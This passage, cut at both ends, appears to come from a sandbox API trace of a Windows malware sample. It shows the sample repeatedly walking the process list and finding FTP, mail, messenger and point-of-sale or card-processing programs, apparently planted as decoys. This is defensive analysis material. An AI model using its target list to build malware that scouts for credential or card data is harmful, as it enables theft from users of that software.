szExeFile="alftp.exe")) returned 1 [0222.039] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.044] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.047] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.064] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.067] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.069] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.072] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0222.074] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0222.076] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0222.078] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0222.080] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0222.082] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.084] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.086] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.087] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.089] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.091] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.093] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.095] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.097] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.138] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.147] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.149] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.151] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.153] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.155] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.157] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.159] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.161] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.163] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.165] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.167] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.169] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.171] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.174] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.176] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.178] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.242] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.245] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.247] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0222.250] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0222.252] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0222.254] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.258] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.261] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0222.263] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.265] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.267] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0222.269] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.271] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0222.272] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0222.275] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.277] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0222.332] CloseHandle (hObject=0x1eb8) returned 1 [0222.333] Sleep (dwMilliseconds=0x64) [0222.377] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0222.398] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.399] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.401] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.402] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.404] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.405] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.407] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.408] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.410] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.443] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.448] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.450] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.452] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.453] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.455] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.456] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.458] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.460] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.462] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.463] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.465] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.467] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.468] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.470] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.472] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.473] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.475] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, 